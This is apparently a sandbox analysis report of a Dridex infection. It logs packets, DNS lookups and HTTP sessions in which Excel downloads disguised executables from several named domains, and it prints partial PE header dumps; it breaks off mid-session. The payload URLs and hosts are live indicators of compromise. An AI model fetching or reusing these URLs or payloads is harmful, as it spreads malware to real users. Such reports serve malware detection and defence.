                                                                                01/20/21-16:15:32.077993TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649315198.57.200.100192.168.2.22

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jan 20, 2021 16:13:16.189310074 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.346859932 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.346925020 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.347480059 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.504955053 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.509875059 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.509907961 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.509926081 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.509943008 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.509980917 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.510015965 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.510040998 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.510061979 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.510082006 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.510194063 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.510210991 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.510323048 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.510387897 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.515320063 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667687893 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667726994 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667747974 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667752028 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667768955 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667778969 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667789936 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667799950 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667817116 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667819977 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667839050 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667840004 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667855978 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667865992 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667872906 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667891026 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667907000 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667915106 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667926073 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667937040 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667954922 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667963982 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667972088 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.667988062 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.667998075 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.668009043 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.668020010 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.668030977 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.668046951 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.668056011 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.668064117 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.668077946 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.668092966 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.668098927 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.668123007 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.668148041 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.668406010 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.668432951 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.668468952 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.668493986 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.669162035 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.825963974 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826013088 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826040983 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826065063 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826159000 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826308012 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826348066 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826368093 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826370955 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826414108 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826446056 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826467991 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826488018 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826488972 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826525927 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826541901 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826565027 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826565027 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826613903 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826618910 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826638937 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826662064 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826664925 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826689005 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826694012 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826708078 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826719046 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826730013 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826741934 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826751947 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826765060 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826773882 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826787949 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826807022 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826809883 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826828957 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826833963 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826850891 CET4916580192.168.2.22192.185.147.185
                                                                                Jan 20, 2021 16:13:16.826855898 CET8049165192.185.147.185192.168.2.22
                                                                                Jan 20, 2021 16:13:16.826880932 CET8049165192.185.147.185192.168.2.22

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jan 20, 2021 16:13:16.112600088 CET5219753192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:13:16.160547018 CET53521978.8.8.8192.168.2.22
                                                                                Jan 20, 2021 16:13:23.137412071 CET5309953192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:13:23.556890965 CET53530998.8.8.8192.168.2.22
                                                                                Jan 20, 2021 16:13:26.432528019 CET5283853192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:13:26.541686058 CET53528388.8.8.8192.168.2.22
                                                                                Jan 20, 2021 16:13:28.072592974 CET6120053192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:13:28.130048990 CET53612008.8.8.8192.168.2.22
                                                                                Jan 20, 2021 16:13:30.252094984 CET4954853192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:13:30.332861900 CET53495488.8.8.8192.168.2.22
                                                                                Jan 20, 2021 16:14:24.282042027 CET5562753192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:14:24.340492964 CET53556278.8.8.8192.168.2.22
                                                                                Jan 20, 2021 16:14:24.349452019 CET5600953192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:14:24.409580946 CET53560098.8.8.8192.168.2.22
                                                                                Jan 20, 2021 16:14:29.059999943 CET6186553192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:14:29.116596937 CET53618658.8.8.8192.168.2.22
                                                                                Jan 20, 2021 16:14:31.766627073 CET5517153192.168.2.228.8.8.8
                                                                                Jan 20, 2021 16:14:31.875066042 CET53551718.8.8.8192.168.2.22

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Jan 20, 2021 16:13:16.112600088 CET192.168.2.228.8.8.80xccaeStandard query (0)monitrade.netA (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:13:23.137412071 CET192.168.2.228.8.8.80x3dfeStandard query (0)bafnabrotherskesarwala.comA (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:13:26.432528019 CET192.168.2.228.8.8.80x315eStandard query (0)artec.com.trA (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:13:28.072592974 CET192.168.2.228.8.8.80xa4ceStandard query (0)www.gastronauts.asiaA (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:13:30.252094984 CET192.168.2.228.8.8.80x7e45Standard query (0)laureys.beA (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:14:29.059999943 CET192.168.2.228.8.8.80x6029Standard query (0)cms.ivpr.orgA (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:14:31.766627073 CET192.168.2.228.8.8.80x762aStandard query (0)salaodigitalautomovel.pt.deve.ptA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Jan 20, 2021 16:13:16.160547018 CET8.8.8.8192.168.2.220xccaeNo error (0)monitrade.net192.185.147.185A (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:13:23.556890965 CET8.8.8.8192.168.2.220x3dfeNo error (0)bafnabrotherskesarwala.com103.11.153.223A (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:13:26.541686058 CET8.8.8.8192.168.2.220x315eNo error (0)artec.com.tr46.28.239.13A (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:13:28.130048990 CET8.8.8.8192.168.2.220xa4ceNo error (0)www.gastronauts.asiagastronauts.asiaCNAME (Canonical name)IN (0x0001)
                                                                                Jan 20, 2021 16:13:28.130048990 CET8.8.8.8192.168.2.220xa4ceNo error (0)gastronauts.asia132.148.96.144A (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:13:30.332861900 CET8.8.8.8192.168.2.220x7e45No error (0)laureys.be85.17.252.207A (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:14:29.116596937 CET8.8.8.8192.168.2.220x6029No error (0)cms.ivpr.org64.37.52.138A (IP address)IN (0x0001)
                                                                                Jan 20, 2021 16:14:31.875066042 CET8.8.8.8192.168.2.220x762aNo error (0)salaodigitalautomovel.pt.deve.pt185.32.190.115A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • monitrade.net
                                                                                • bafnabrotherskesarwala.com
                                                                                • artec.com.tr
                                                                                • www.gastronauts.asia
                                                                                • laureys.be
                                                                                • cms.ivpr.org
                                                                                • salaodigitalautomovel.pt.deve.pt

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.2249165192.185.147.18580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jan 20, 2021 16:13:16.347480059 CET0OUTGET /h79fwesfe.rar HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: monitrade.net
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:16.509875059 CET2INHTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:13:16 GMT
                                                                                Server: Apache
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, Keep-Alive
                                                                                Last-Modified: Tue, 12 Jan 2021 11:40:23 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 765440
                                                                                Keep-Alive: timeout=5, max=75
                                                                                Content-Type: application/x-rar-compressed
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a1 fa 01 10 c3 fa 01 10 b7 fa 01 10 89 fa 01 10 95 fa 01 10 50
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$15Q!uT?ruT?ruT?rrtT?rxrwT?rxrtT?rxrzT?rxrwT?rrvT?ruT>r<T?rxrtT?rxrzT?rxrtT?rxrtT?rRichuT?rPELR!do@`rM\q<`8(@p\.textbd `.datah@.idata p@@.rsrc@@.reloc@BP


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.2249166103.11.153.22380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jan 20, 2021 16:13:23.737931967 CET809OUTGET /ys95lm6k.rar HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: bafnabrotherskesarwala.com
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:23.911391973 CET810INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 20 Jan 2021 15:13:21 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.224916746.28.239.1380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jan 20, 2021 16:13:26.615818024 CET810OUTGET /xkpffwn.zip HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: artec.com.tr
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:26.689331055 CET812INHTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:13:25 GMT
                                                                                Server: Apache
                                                                                Last-Modified: Mon, 11 Jan 2021 21:14:58 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 765440
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/zip
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a1 fa 01 10 c3 fa 01 10 b7 fa 01 10 89 fa 01 10 95 fa 01 10 50 f9 01 10 b0 f9 01 10 20 fa 01 10 00 00 00 00 00 00 00 00 4c 51 0a 10 54 8d 0a 10 4f 99 0a 10 68 f7 0a 10 00 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$15Q!uT?ruT?ruT?rrtT?rxrwT?rxrtT?rxrzT?rxrwT?rrvT?ruT>r<T?rxrtT?rxrzT?rxrtT?rxrtT?rRichuT?rPELR!do@`rM\q<`8(@p\.textbd `.datah@.idata p@@.rsrc@@.reloc@BP LQTOh


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.2249168132.148.96.14480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jan 20, 2021 16:13:28.319467068 CET1620OUTGET /ylztwx.rar HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: www.gastronauts.asia
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:28.514552116 CET1621INHTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:13:28 GMT
                                                                                Server: Apache
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, Keep-Alive
                                                                                Last-Modified: Wed, 20 Jan 2021 08:57:00 GMT
